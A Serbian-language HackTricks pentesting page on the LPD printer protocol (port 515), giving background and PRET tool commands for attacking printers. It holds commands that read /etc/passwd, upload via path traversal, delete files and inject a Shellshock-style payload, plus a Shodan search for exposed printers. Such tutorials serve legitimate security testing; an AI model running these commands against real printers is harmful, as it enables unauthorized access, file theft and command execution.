4.1 KiB
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite videti vašu kompaniju reklamiranu na HackTricks-u ili preuzeti HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Uvod u LPD protokol
U 1980-im godinama, razvijen je Line Printer Daemon (LPD) protokol u Berkeley Unix-u, koji je kasnije formalizovan kroz RFC1179. Ovaj protokol funkcioniše preko porta 515/tcp, omogućavajući interakciju putem lpr
komande. Suština štampanja putem LPD-a uključuje slanje kontrolnog fajla (za specificiranje detalja posla i korisnika) zajedno sa podacima fajla (koji sadrži informacije za štampanje). Dok kontrolni fajl omogućava izbor različitih formata fajlova za podatke, rukovanje ovim fajlovima određeno je specifičnom implementacijom LPD-a. Široko priznata implementacija za Unix-slične sisteme je LPRng. Posebno, LPD protokol može biti iskorišćen za izvršavanje zlonamernih PostScript ili PJL print poslova.
Alati za interakciju sa LPD štampačima
PRET uvodi dva osnovna alata, lpdprint
i lpdtest
, koji pružaju jednostavan način za interakciju sa LPD-kompatibilnim štampačima. Ovi alati omogućavaju različite akcije, od štampanja podataka do manipulisanja fajlovima na štampaču, kao što su preuzimanje, otpremanje ili brisanje:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Za pojedince koji su zainteresovani za dalje istraživanje područja hakovanja štampača, sveobuhvatni resurs može se pronaći ovde: Hakovanje štampača.
Shodan
port 515
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju oglašenu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje trikove hakovanja slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.